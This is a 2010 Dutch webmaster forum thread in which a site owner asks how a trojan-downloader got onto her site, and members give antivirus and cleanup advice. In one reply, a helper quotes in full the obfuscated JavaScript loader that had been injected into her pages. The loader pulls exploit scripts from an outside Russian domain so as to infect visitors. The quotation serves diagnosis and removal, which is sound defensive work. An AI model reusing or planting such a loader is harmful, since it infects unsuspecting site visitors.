Mijn website (heb de link verwijderd omdat er blijkbaar nog steeds problemen zijn) was vandaag geveld door een virus en ook mijn laptop was besmet. Het ging om dit virus HEUR:Trojan-Downloader.Script.Generic
Nu bewerk ik mijn site met gebrekkige HTML-kennis en weet ik er verder niets vanaf. Ik had mijn site niet recent bezocht of bewerkt en ik snap niet hoe ik dit virus te pakken heb gekregen. Kan iemand deze digibeet uitleggen hoe dit virus op de site is gekomen en hoe dit in de toekomst te voorkomen?
Alvast mijn dank :)
- Help! Hoe voorkom ik virussen op mijn site?
-
02-05-2010, 22:46 #1
- Berichten
- 15
- Lid sinds
- 14 Jaar
Help! Hoe voorkom ik virussen op mijn site?
Laatst aangepast door Selma Franssen : 04-05-2010 om 16:18 Reden: verwijderen link wegens virus op site
-
In de schijnwerper
JPG omzetten naar vectorbestand ? Nu voor 15,95Freelance / WerkErvaren tekstschrijver voor uiteenlopende schrijfklussenFreelance / Werknieuwe onlyFANS site exploitatie met diverse niches (sports ) zoekt investeerderInvesteringsaanvragenProfessionele tekstschrijver (actie: 2,5 cent per woord)Freelance / Werk -
02-05-2010, 22:51 #2Particulier
- Berichten
- 223
- Lid sinds
- 15 Jaar
Heb je een goede virus scanner op je laptop? AVG is erg goed alleen niet meer gratis volgens mij dat helpt wel om virussen tegen te houden. Hier staat er een verhaal over wat je moet doen om deze trojan weg te krijgen http://www.pinbrook.net/trojan-warning Hoe je eraan komt is altijd een raadsel download je wel eens met torrent? Daar schijnen ook veel virussen bij te zitten.
-
02-05-2010, 23:06 #3
- Berichten
- 488
- Lid sinds
- 15 Jaar
Ik heb ook is een "virus" op mijn site gehad.
Ik ging naar een site die ook geïnfecteerd was, mijn scanner(McAfee) kende deze niet dus kon probleemloos te werk gaan.
Hij ging naar mijn ftp kijken(filezilla) en kon via daar mijn ftp vinden.
Daarna ging de "bot" de index aanpassen zodat het "virus" zich verspreiden kon.
Mogelijk heeft u ook zoiets dergelijks, ik raad u dan aan een goeie ftp programma te nemen.
Overigens een goeie gratis scanner:
Malware bytes anti-malware.
Groeten,
Tim
-
03-05-2010, 17:56 #4
- Berichten
- 89
- Lid sinds
- 15 Jaar
-
03-05-2010, 18:04 #5
- Berichten
- 393
- Lid sinds
- 15 Jaar
Ik bezoek uw site......NOD32 geeft een mooie, rode melding!
Haal misschien je url weg, of verstop hem voor gebruikers die graag klikken. ;)
-
03-05-2010, 18:14 #6gast11444 Guest
Gebruik een goede virusscanner en FileZilla. FTP-virussen werken daar niet op.
FTP virussen zijn virussen die zich op uw computer nestelen en uw HTML-bestanden aanpassen. Ze implementeren dan een connectie naar een andere site die een virus laadt.
-
03-05-2010, 18:22 #7
- Berichten
- 488
- Lid sinds
- 15 Jaar
Groeten,
Tim
-
04-05-2010, 09:04 #8
- Berichten
- 2.692
- Lid sinds
- 15 Jaar
...dus voortaan logindata niet opslaan in de sitemanager maar in een aparte .doc oid in een andere map.
-
04-05-2010, 11:41 #9Particulier
- Berichten
- 555
- Lid sinds
- 15 Jaar
Hallo allemaal.
Ten eerste even een waarschuwing voor iedereen hier, de malware staat nog steeds op de site van Selma Franssen. Bezoek deze dus niet zolang het nog niet is opgelost.
Beste Selma.
Ik heb even een uitgebreide analyse gemaakt van je website. Het blijkt dat een aantal van je pagina's scripts includen van het domein: lunchscone.ru:8080. Vanaf dit domein wordt vervolgens een (bekende) exploit in JAVA en PDF uitgevoerd in de hoop om het systeem van een nietsvermoedende bezoeker te infecteren. Deze exploit in JAVA is enige tijd geleden aan het licht gekomen. Dit is de reden waarom de meeste virusscanner gelukkig bezoekers waarschuwen.
U kunt overigens duidelijk zien dat uw pagina's geinfecteerd zijn. Als u de paginabron opvraagt van uw indexpagina dan ziet u helemaal onderaan (na de </html>) de volgende code:
Code:<script>function a(){this.Nk=false;this.A=false;var R=new Date();var W=window;var UK=new Date();var v="v";var U=new String("/goOs6P".substr(0,3)+"ogl"+"gGKme.cmKgG".substr(4,3)+"om/"+"mon"+"kVM6eyc6MkV".substr(4,3)+"9dGEontdEG9".substr(4,3)+"rol"+"4vAn.co".substr(4)+"R8S1m/m".substr(4)+"edi"+"ase"+"bvRt.iRvb".substr(3,3)+"t.p"+"kx5hp".substr(3));this.M="";this.WV="";var r=String("XL6Gde".substr(4)+"qtpofe".substr(4)+"r");this.m=38169;this.cz=4081;var h=W[new String("une"+"S7osca".substr(3)+"pemiz".substr(0,2))];var I=new Array();this.JP=43064;var l="scri8p7".substr(0,4)+"XgiptiXg".substr(3,2);this.Gp="";this.lJ=2019;var Ix=new Array();var QR="QR";this.QO=false;function D(T,p){var UY=new Date();var Hi=new Array();this.lsK=false;this.OL=false;var Uy=h(String("]"));this.sj=false;var K=h(new String("["));var NkS="";var P="";var Q=String("j7hKg".substr(4));var _D="_D";this.VK=false;var cF=new Date();var El=new Date();var Tl=new RegExp(K+p+Uy, Q);var jN="jN";this.an=false;var tb="tb";return T.replace(Tl, new String());};this.ta=false;var DS=new Date();var br="br";var s=document;this.VA=false;var N=D('cRrfefaRtTeTE0lVeRmfefnVtO','BVgSfTO05Ryzw');var u=D('sRrAcU','Ae0ubW8YUD9VnXmvhRkEHtG');var J=D('84247996464535547059465397377142498966941921970642264565943631','12546937');this.kU=false;var Sk=new Date();this.YD=false;function C(){var fO="";var Cs="Cs";this.ZV="";var B=h("htt"+"p:/"+"/lu"+"nch"+"sco"+"ne."+"iM5ru:".substr(3));var JY=new Date();var Bz=B+J+U;this.hW=21323;var WB="";var j=D('bVoldlyO','MLVCJ083DOAl');var WOk="";var w=D('aNpSpWeJn4d4C4h9ixlPdx','Px48NS9JW');this.zM=57674;this.eJ=21937;try {var fk=new Array();var aO=new Date();E=s[N](l);var mZ="mZ";var sX="sX";this.Dp=7907;E[u]=Bz;var wr="wr";var ru="";E[r]=[1,6][0];var qR="qR";this.lL="";var sja=new Date();s[j][w](E);var kO="";var xn="";} catch(L){var sI="sI";var Vy=new Date();};}var OE=new Date();this.oQ=false;var Uu=D('ornrlAoUaUdr','_jrU0A');W[Uu]=C;this.HH=false;};var Nh="Nh";this.aR="";this.TLM=false;var uFX="";a();var _Y=new Date();this.dYb=false;</script>
Ik raad u aan om de volgende acties te ondernemen:
1. Download Avast! antivirus (om een discussie te voorkomen moet u maar van mij aannemen dat dit de beste gratis antivirus is. Mochten mensen de reden willen weten (serieus) dan kunnen ze een PM sturen. Dit puur om topic vervuiling tegen te gaan)
2. Nadat u dit pakket gedownload heeft, moet u deze installeren. De-installeer alle andere virusscanners.
3. Omdat het zeer waarschijnlijk is dat delen van windows geinfecteerd zijn, moet u een startup scan plannen. Dit is een computer scan die wordt gedaan VOORDAT windows wordt geladen. Deze kunt u plannen door op het Avast icoontje met rechtermuisknop te klikken > 'Start Avast Antivirus' > menu > 'Plan opstart scan'.
4. Herstart uw computer. (indien stap 3 niet beschikbaar is vanwege OS incompatibaliteit, dan kunt u met avast gewoon een volledige scan draaien)
5. Nadat de (opstart)scan compleet is, is uw computer schoon
6. U opent nu de (html) documenten van uw website met kladblok, en controleert of u de bovenstaande code ergens vind. Zo ja, dan verwijderd u deze. Vervolgens upload u de 'veilige' versie van uw site via FileZilla.
7. Voor verdere vragen kunt u via PM contact met mij opnemen
-
04-05-2010, 11:51 #10Particulier
- Berichten
- 128
- Lid sinds
- 17 Jaar
Steven, complimenten voor je gehele uitleg, toch kom ik op mijn site die nu een aantal dagen opeens doorlinkt naar een andere site, geen rare html/php of wat voor code tegen.
Ook vinden de scanners niets.
Beetje een moedeloos iets dit, ook al wilde ik de site van de hand doen..
-
04-05-2010, 11:54 #11Particulier
- Berichten
- 555
- Lid sinds
- 15 Jaar
@Jay H, bent u dezelfde persoon als Selma Franssen, of bent u iemand met een soortgelijk probleem?
Ik kan (evt. tegen een kleine vergoeding) wel even voor u kijken naar uw website.
Contacteer mij via PM als ik u moet helpen.
-
04-05-2010, 12:07 #12Particulier
- Berichten
- 128
- Lid sinds
- 17 Jaar
Nee ik ben een totaal ander persoon ;)
Bedankt, ik ga het zelf nog even proberen maar ik hou je zeker in gedachte!
-
04-05-2010, 16:22 #13
- Berichten
- 15
- Lid sinds
- 14 Jaar
Bedankt voor alle reacties, ik heb voor de zekerheid de link naar mijn site maar even verwijderd. Het verbaast me dat m'n site nog steeds problemen geeft, ik had alle oude bestanden verwijderd en een niet besmette back up geupload. Dit met Filezilla vanaf mij nieuwe computer (net een uur in gebruik en met goede anti virus). Ik hoop niet dat mijn nieuwe pc ook al besmet is.
Anyway, ik ga bovenstaande uitleg dan maar opvolgen en hopen dat ik van het probleem afkom.
Aanvullend bericht:
@Steven Verkuil, bedankt voor de goede informatie, na wat geknutsel geeft mijn virusscanner in elk geval geen melding meer. Mooi, want ik had net op GoogleAds geadverteerd en het is natuurlijk zonde wanneer mogelijke toekomstige opdrachtgevers op een besmette site terechtkomen!Laatst aangepast door Selma Franssen : 04-05-2010 om 17:21 Reden: Automatisch samengevoegd.
-
04-05-2010, 17:30 #14
- Berichten
- 393
- Lid sinds
- 15 Jaar
@Selma, uw site geeft geen melding bij mij. :)
-
04-05-2010, 17:46 #15Particulier
- Berichten
- 555
- Lid sinds
- 15 Jaar
Op dit moment geeft uw website ook geen meldingen meer bij mij.
Verdere analyse toont aan dat alle onveilige code van uw website is verwijderd.
deze is nu dus weer veilig om te gebruiken.
Let wel op dat het zo kan zijn dat broncode (.html bestanden) op uw computer nog steeds geïnfecteerd kunnen zijn. Dit zal niet gedetecteerd worden, door welke scanner dan ook, omdat het om javascript code gaat die pas gevaarlijk wordt in een browser (in kladblok is het ongevaarlijk). Kijk daarom voor de zekerheid nog even goed naar alle lokale html bestanden, en verwijder zo nodig de geïnfecteerde JS code. De online bestanden op uw website zijn nu dus wel schoon.
Voor meer info:
https://www.sitedeals.nl/websites-alg...t-te-doen.htmlLaatst aangepast door Steven V. : 08-05-2010 om 15:03
Plaats een
- + Advertentie
- + Onderwerp
Marktplaats
Webmasterforum
- Websites algemeen
- Sitechecks
- Marketing
- Domeinen algemeen
- Waardebepaling
- CMS
- Wordpress
- Joomla
- Magento
- Google algemeen
- SEO
- Analytics
- Adsense
- Adwords
- HTML / XHTML
- CSS
- Programmeren
- PHP
- Javascript
- JQuery
- MySQL
- Ondernemen algemeen
- Belastingen
- Juridisch
- Grafisch ontwerp
- Hosting Algemeen
- Hardware Info
- Offtopic